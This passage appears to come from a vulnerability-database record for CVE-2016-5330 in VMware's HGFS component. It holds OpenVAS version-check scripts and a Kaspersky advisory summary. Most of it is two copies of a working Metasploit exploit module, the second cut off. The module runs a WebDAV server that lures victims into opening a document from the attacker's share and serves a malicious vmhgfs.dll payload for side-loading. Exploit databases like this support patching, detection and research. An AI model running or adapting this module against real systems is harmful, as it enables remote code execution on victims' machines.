value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vmware_fusion_detect_macosx.nasl\");\n script_mandatory_keys(\"VMware/Fusion/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(8\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"8.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"8.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.", "modified": "2018-10-24T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809024", "type": "openvas", "title": "VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_player_hgfs_privilege_escalation_vuln_win.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809024\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", 
value:\"VMware Workstation Player 12.1.x before\n 12.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation Player\n version 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-07T20:44:47", "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, a component of VMware Tools. This issue can be exploited by luring a victim into opening a document from the attacker's share. An attacker can exploit this issue to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system. 
If the WebDAV Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\n", "published": "2016-08-05T18:19:40", "type": "metasploit", "title": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/MISC/VMHGFS_WEBDAV_DLL_SIDELOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\n 'Description' => %q{\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. 
If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\n },\n 'Author' => 'Yorick Koster',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2016-5330'],\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Payload' => { 'Space' => 2048, },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-08-05',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\n ])\n\n # no SSL\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\n end\n\n\n def on_request_uri(cli, request)\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_status(\"#{request.method} => 404 (#{request.uri})\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n end\n\n\n def process_get(cli, request)\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav = \"\\\\\\\\#{myhost}\\\\\"\n\n if (request.uri =~ /vmhgfs\\.dll$/i)\n print_status(\"GET => DLL Payload (#{request.uri})\")\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n if (request.uri =~ /\\.docx$/i)\n print_status(\"GET => DOCX (#{request.uri})\")\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\n return\n end\n\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\n print_status(\"GET => REDIRECT (#{request.uri})\")\n resp = create_response(200, \"OK\")\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n\n print_status(\"GET => 404 (#{request.uri})\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n cli.send_response(resp)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"OPTIONS #{request.uri}\")\n headers = {\n 'MS-Author-Via' => 'DAV',\n 'DASL' => '<DAV:sql>',\n 'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',\n 'Cache-Control' => 'private'\n }\n resp = create_response(207, \"Multi-Status\")\n headers.each_pair {|k,v| resp[k] = v }\n resp.body = \"\"\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n 
print_status(\"PROPFIND #{path}\")\n body = ''\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n my_uri = \"http://#{my_host}/\"\n\n if path !~ /\\/$/\n\n if blacklisted_path?(path)\n print_status \"PROPFIND => 404 (#{path})\"\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n cli.send_response(resp)\n return\n end\n\n if path.index(\".\")\n print_status \"PROPFIND => 207 File (#{path})\"\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n return\n else\n print_status \"PROPFIND => 301 (#{path})\"\n resp = create_response(301, \"Moved\")\n resp[\"Location\"] = path + \"/\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n end\n\n print_status \"PROPFIND => 207 Directory (#{path})\"\n body = %Q|<?xml version=\"1.0\" 
encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n\n if request[\"Depth\"].to_i > 0\n trail = path.split(\"/\")\n trail.shift\n case trail.length\n when 0\n body << generate_shares(path)\n when 1\n body << generate_files(path)\n end\n else\n print_status \"PROPFIND => 207 Top-Level Directory\"\n end\n\n body << \"</D:multistatus>\"\n\n body.gsub!(/\\t/, '')\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n end\n\n def generate_shares(path)\n share_name = datastore['SHARENAME']\n%Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{share_name}/</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % 
rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n end\n\n def generate_files(path)\n trail = path.split(\"/\")\n return \"\" if trail.length < 2\n\n %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n end\n\n def gen_timestamp(ttype=nil)\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n end\n\n def gen_datestamp(ttype=nil)\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end\n\n # This method rejects requests that are known to break exploitation\n def blacklisted_path?(uri)\n return true if uri =~ /\\.exe/i\n return true if uri =~ /\\.(config|manifest)/i\n return true if uri =~ /desktop\\.ini/i\n return true if uri =~ /lib.*\\.dll/i\n return true if uri =~ /\\.tmp$/i\n return true if uri =~ /(pcap|packet)\\.dll/i\n false\n end\n\n def 
exploit\n\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\n\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\n\n super\n end\nend\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb"}], "kaspersky": [{"lastseen": "2020-09-02T11:46:28", "bulletinFamily": "info", "cvelist": ["CVE-2016-5330"], "description": "### *Detect date*:\n08/07/2016\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn untrusted search path vulnerability was found in VMware products. By exploiting this vulnerability, malicious users can gain privileges. This vulnerability can be exploited locally via DLL hijacking.\n\n### *Affected products*:\nVMware Workstation 12.1 versions earlier than 12.1.1 \nVMware Player 12.1 versions earlier than 12.1.1 \nVMware Fusion 8.1 versions earlier than 8.1.1\n\n### *Solution*:\nUpdate to the latest version \n[VMware downloads page](<https://my.vmware.com/en/web/vmware/downloads>)\n\n### *Original advisories*:\n[VMware advisory](<http://www.vmware.com/security/advisories/VMSA-2016-0010.html>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[VMware Workstation](<https://threats.kaspersky.com/en/product/VMware-Workstation/>)\n\n### *CVE-IDS*:\n[CVE-2016-5330](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5330>) 4.4 Warning", "edition": 43, "modified": "2020-05-22T00:00:00", "published": "2016-08-07T00:00:00", "id": "KLA10854", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10854", "title": "KLA10854 Privileges escalation vulnerabilities in VMware products", "type": "kaspersky", "cvss": {"score": 
4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:02", "description": "", "published": "2016-08-11T00:00:00", "type": "packetstorm", "title": "DLL Side Loading In VMware Host Guest Client Redirector", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2016-08-11T00:00:00", "id": "PACKETSTORM:138289", "href": "https://packetstormsecurity.com/files/138289/DLL-Side-Loading-In-VMware-Host-Guest-Client-Redirector.html", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', \n'Description' => %q{ \nA DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, \na component of VMware Tools. This issue can be exploited by luring a victim into \nopening a document from the attacker's share. An attacker can exploit this issue to \nexecute arbitrary code with the privileges of the target user. This can potentially \nresult in the attacker taking complete control of the affected system. If the WebDAV \nMini-Redirector is enabled, it is possible to exploit this issue over the internet. 
\n}, \n'Author' => 'Yorick Koster', \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2016-5330'], \n['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'], \n['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Payload' => { 'Space' => 2048, }, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', {'Arch' => ARCH_X86_64,} ], \n[ 'Windows x86', {'Arch' => ARCH_X86,} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Aug 5 2016', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]), \nOptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]), \nOptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ]) \n], self.class) \n \n# no SSL \nderegister_options('SSL', 'SSLVersion', 'SSLCert') \nend \n \n \ndef on_request_uri(cli, request) \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_status(\"#{request.method} => 404 (#{request.uri})\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \nend \n \n \ndef process_get(cli, request) \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /vmhgfs\\.dll$/i) \nprint_status(\"GET => DLL Payload (#{request.uri})\") \nreturn if ((p = regenerate_payload(cli)) == nil) \ndata = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded }) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.docx$/i) \nprint_status(\"GET => DOCX (#{request.uri})\") \nsend_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' }) \nreturn \nend \n \nif (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i) \nprint_status(\"GET => REDIRECT (#{request.uri})\") \nresp = create_response(200, \"OK\") \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>| \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \n \nprint_status(\"GET => 404 (#{request.uri})\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"OPTIONS #{request.uri}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n'DASL' => '<DAV:sql>', \n'DAV' => '1, 2', \n'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', \n'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', \n'Cache-Control' => 'private' \n} \nresp = create_response(207, \"Multi-Status\") \nheaders.each_pair {|k,v| resp[k] = v } \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri 
\nprint_status(\"PROPFIND #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path !~ /\\/$/ \n \nif blacklisted_path?(path) \nprint_status \"PROPFIND => 404 (#{path})\" \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \ncli.send_response(resp) \nreturn \nend \n \nif path.index(\".\") \nprint_status \"PROPFIND => 207 File (#{path})\" \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nreturn \nelse \nprint_status \"PROPFIND => 301 (#{path})\" \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status \"PROPFIND => 207 Directory (#{path})\" \nbody = 
%Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nif request[\"Depth\"].to_i > 0 \ntrail = path.split(\"/\") \ntrail.shift \ncase trail.length \nwhen 0 \nbody << generate_shares(path) \nwhen 1 \nbody << generate_files(path) \nend \nelse \nprint_status \"PROPFIND => 207 Top-Level Directory\" \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_shares(path) \nshare_name = datastore['SHARENAME'] \n%Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{share_name}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> 
\n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nend \n \ndef generate_files(path) \ntrail = path.split(\"/\") \nreturn \"\" if trail.length < 2 \n \n%Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nend \n \ndef gen_timestamp(ttype=nil) \n::Time.now.strftime(\"%a, %d %b %Y 